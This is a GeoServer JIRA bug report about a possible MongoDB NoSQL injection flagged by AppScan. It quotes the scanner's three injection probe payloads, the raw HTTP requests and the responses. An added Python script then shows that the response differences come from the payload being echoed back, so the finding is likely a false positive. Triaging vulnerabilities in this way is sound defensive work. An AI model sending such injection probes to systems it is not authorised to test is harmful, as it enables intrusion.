[Geoserver-devel] [JIRA] (GEOS-7706) MongoDB NoSQL Injection - triggered by appscan - please confirm if it is real

Radu created an issue

GeoServer / Bug GEOS-7706

MongoDB NoSQL Injection - triggered by appscan - please confirm if it is real

Issue Type:

Bug

Assignee:

Unassigned

Created:

29/Aug/16 8:33 AM

Priority:

Medium

Reporter:

Radu

MongoDB NoSQL Injection
Severity: High
CVSS Score: 9.7
URL: http://192.168.12.8:8080/geoserver/ows
Entity: request (Parameter)
Risk: It is possible to view, modify or delete database entries and tables
Causes: Sanitation of hazardous characters was not performed correctly on user input

Fix: Ensure user input is of the correct type and escape it properly
Difference: Parameter manipulated from: GetCapabilities to: GetCapabilities","$782":"
Parameter manipulated from: GetCapabilities to: GetCapabilities","$query":{},"A":"
Parameter manipulated from: GetCapabilities to: GetCapabilities","$query":{"Non1Existent2Field":3},"A":"
Reasoning: AppScan sent three requests: Error, True, and False. All three responses were different from one another, which
insinuates that the MongoDB injection succeeded.
Test Requests and Responses:
GET /geoserver/ows?service=WCS&version=2.0.1&request=GetCapabilities","$782":" HTTP/1.1
Cookie: JSESSIONID=kcq93t8as2971prultzmcw9hr
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://xxxxxxxxxxxxx:8080/geoserver/web/
Host: xxxxxxxx:8080
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)

HTTP/1.1 501 Not Implemented
Content-Type: application/xml
Transfer-Encoding: chunked
Server: Jetty(9.2.13.v20150730)

<ows:ExceptionReport xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:ows="http://www.opengis.net/ows/2.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="2.0.0" xsi:schemaLocation="http://www.opengis.net/ows/2.0 http://schemas.opengis.net/ows/2.0/owsExceptionReport.xsd">
<ows:Exception exceptionCode="OperationNotSupported" locator="GetCapabilities","$782":"">
<ows:ExceptionText>No such operation WCS 2.0.1 GetCapabilities&quot;,&quot;$782&quot;:&quot;
</ows:ExceptionText>
</ows:Exception>
</ows:ExceptionReport>
GET /geoserver/ows?service=WCS&version=2.0.1&request=GetCapabilities","$query":{},"A":" HTTP/1.1
Cookie: JSESSIONID=kcq93t8as2971prultzmcw9hr
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://xxxxxxxxxx:8080/geoserver/web/
Host: xxxxxxxx:8080
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)

HTTP/1.1 501 Not Implemented
Content-Type: application/xml
Transfer-Encoding: chunked
Server: Jetty(9.2.13.v20150730)

<ows:ExceptionReport xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:ows="http://www.opengis.net/ows/2.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="2.0.0" xsi:schemaLocation="http://www.opengis.net/ows/2.0 http://schemas.opengis.net/ows/2.0/owsExceptionReport.xsd">
<ows:Exception exceptionCode="OperationNotSupported" locator="GetCapabilities","$query":{},"A":"">
<ows:ExceptionText>No such operation WCS 2.0.1 GetCapabilities&quot;,&quot;$query&quot;:{},&quot;A&quot;:&quot;
</ows:ExceptionText>
</ows:Exception>
</ows:ExceptionReport>
GET /geoserver/ows?service=WCS&version=2.0.1&request=GetCapabilities","$query":{"Non1Existent2Field":3},"A":" HTTP/1.1
Cookie: JSESSIONID=kcq93t8as2971prultzmcw9hr
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://192.168.12.8:8080/geoserver/web/
Host: 192.168.12.8:8080
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)

HTTP/1.1 501 Not Implemented
Content-Type: application/xml
Transfer-Encoding: chunked
Server: Jetty(9.2.13.v20150730)

<ows:ExceptionReport xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:ows="http://www.opengis.net/ows/2.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="2.0.0" xsi:schemaLocation="http://www.opengis.net/ows/2.0 http://schemas.opengis.net/ows/2.0/owsExceptionReport.xsd">
<ows:Exception exceptionCode="OperationNotSupported" locator="GetCapabilities","$query":{"Non1Existent2Field":3},"A":"">
<ows:ExceptionText>No such operation WCS 2.0.1 GetCapabilities&quot;,&quot;$query&quot;:{&quot;Non1Existent2Field&quot;:3},&quot;A&quot;:&quot;
</ows:ExceptionText>
</ows:Exception>
</ows:ExceptionReport>
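The scanner's only stated evidence is "three responses, all different". Before anyone chases a MongoDB query path, the first check is whether the three bodies still differ once the echoed probe is taken out of them. The script below is an added triage example, not part of this report and not GeoServer code; it does not contact a server. The three GeoServer responses are constructed from the ExceptionReports quoted above (same status, exception code and echoed request value); the second data set is a hypothetical query endpoint, included only to show what the same check returns when the probes do change server behaviour. The function names are mine.

```python
"""Re-run a scanner's differential NoSQL-injection test with the reflected
payload removed before comparing responses.

Added triage example for GEOS-7706.  Not GeoServer code; talks to no server.
GEOSERVER_RESPONSES is constructed from the three ExceptionReports in the
report, HYPOTHETICAL_RESPONSES is an invented endpoint for contrast.
"""
from __future__ import annotations

import html
from urllib.parse import quote

OWS_BASE = "http://192.168.12.8:8080/geoserver/ows"  # URL from the report

# The three request= values AppScan sent (its "Error", "True" and "False" probes).
PROBES = {
    "error": 'GetCapabilities","$782":"',
    "true":  'GetCapabilities","$query":{},"A":"',
    "false": 'GetCapabilities","$query":{"Non1Existent2Field":3},"A":"',
}


def build_url(base: str, payload: str, service: str = "WCS", version: str = "2.0.1") -> str:
    """Percent-encode the probe so quotes, braces and '$' survive the query string
    when the request is replayed with curl or a browser (AppScan sent them raw)."""
    return f"{base}?service={service}&version={version}&request={quote(payload, safe='')}"


def geoserver_response(payload: str) -> tuple[int, str]:
    """Constructed stand-in for what the report shows for every probe: HTTP 501 and
    an OWS ExceptionReport that echoes the unknown request value raw in the
    locator attribute and XML-escaped in the ExceptionText, exactly as quoted."""
    body = (
        '<ows:ExceptionReport xmlns:ows="http://www.opengis.net/ows/2.0" version="2.0.0">'
        f'<ows:Exception exceptionCode="OperationNotSupported" locator="{payload}">'
        f"<ows:ExceptionText>No such operation WCS 2.0.1 {html.escape(payload, quote=True)}"
        "</ows:ExceptionText></ows:Exception></ows:ExceptionReport>"
    )
    return 501, body


GEOSERVER_RESPONSES = {name: geoserver_response(p) for name, p in PROBES.items()}

# Hypothetical endpoint (NOT observed on GeoServer) where the probes do reach a
# query engine: the error probe breaks the query, true/false change the result set.
HYPOTHETICAL_RESPONSES = {
    "error": (500, '{"error":"unterminated string in query"}'),
    "true":  (200, '{"count":3,"results":["a","b","c"]}'),
    "false": (200, '{"count":0,"results":[]}'),
}


def strip_reflection(body: str, payload: str) -> str:
    """Replace every echoed copy of the probe, raw or XML/HTML-escaped, with a
    placeholder so only the server's own behaviour is left to compare."""
    for form in (payload, html.escape(payload, quote=True)):
        body = body.replace(form, "<PAYLOAD>")
    return body


def triage(responses: dict[str, tuple[int, str]], probes: dict[str, str]) -> dict:
    """AppScan's rule is 'three different responses => injection'.  Compare status
    and body again after stripping the reflection.  If nothing differs, the
    parameter was only echoed into an error message; that alone says nothing about
    whether it ever reached a database query."""
    residuals = {
        name: (status, strip_reflection(body, probes[name]))
        for name, (status, body) in responses.items()
    }
    raw_differ = len(set(responses.values())) > 1
    residual_differ = len(set(residuals.values())) > 1
    if residual_differ:
        verdict = "differs-beyond-reflection"  # worth a manual look
    elif raw_differ:
        verdict = "reflection-only"            # scanner only saw its own payload echoed
    else:
        verdict = "identical"
    return {"verdict": verdict, "residuals": residuals}


if __name__ == "__main__":
    for name, payload in PROBES.items():
        print(name, build_url(OWS_BASE, payload))
    print("GeoServer responses from the report:", triage(GEOSERVER_RESPONSES, PROBES)["verdict"])
    print("Hypothetical query endpoint:        ", triage(HYPOTHETICAL_RESPONSES, PROBES)["verdict"])
```

On the report's own data the three 501 ExceptionReports collapse to one template once the echoed request value is masked, so the "three different responses" observation is fully explained by the dispatcher reflecting an unrecognised operation name. Whether the `request` parameter is ever passed into a MongoDB query is a separate question for the developers, which is what the reporter is asking; a real positive would look like the hypothetical set, where status and content change without the payload being echoed at all.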


This message was sent by Atlassian JIRA (v1000.285.1#100011-sha1:7e723f8)
